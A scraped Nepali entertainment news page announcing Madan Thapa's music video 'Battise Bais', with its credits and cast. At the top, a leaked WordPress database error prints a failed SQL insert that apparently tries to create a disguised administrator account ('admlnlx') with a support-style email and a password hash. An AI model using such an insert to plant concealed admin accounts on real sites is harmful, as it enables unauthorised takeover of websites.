WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7ixqIZYbAu.2TjHtgUxUaI0dQiNOo1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 06:33:04', '', 'admlnlx', 'admlnlx')

मदन थापाको बत्तिसे बैंस सार्वजनिक (भिडियो सहित) – Gaule Khabar

मदन थापाको बत्तिसे बैंस सार्वजनिक (भिडियो सहित)

मदन थापाको बत्तिसे बैंस सार्वजनिक (भिडियो सहित)

काठमाण्डौ । युवा गायक मदन थापाको बत्तिसे बैंस बोलको गीतको भिडियो बजारमा सार्वजनिक भएको छ ।

राजेन्द्र भन्डारीको शब्द, मदन कुमार थापा र सङ्गिता तिमिलसिनको स्वार रहेको गीतमा मदन कुमार थापाकै संगीत रहेको छ भने संगीत संयोजन बिष्णु तमाङको छ ।

शशिबिक्रम थापाको निर्देशनमा निर्माण भएको उक्त म्युजिक भिडियोमा मदनकुमार थापा, ओसिका केसि, जगदिस अधिकारी, टिकाजङ राईमाझी, बुझुले रोका, मन्जिता सिटौला, बिन्दा सेन्च्युरी, बिनिता सेन्च्युरी, रिना ल्युइटेल, सजिता चौलागाई, सुदर्सन ल्युइटेल लगायता कलाकारहरुले अभिनय गरेकाछन ।

गाउँले ईन्टरनेटमेन्ट मिडिया ग्रुप प्रा.लि.को प्रोस्ट प्रोडक्सनमा निर्मित म्युजिक भिडियोमा छयाङ्कन गङ्गाराम राईको रहेको छ भने ड्रोन भिम तामाङ र सम्पादन गङ्गाराम राईको रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका